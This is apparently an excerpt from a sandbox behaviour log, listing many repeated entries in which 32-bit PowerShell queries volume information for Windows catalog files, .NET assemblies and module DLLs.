                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
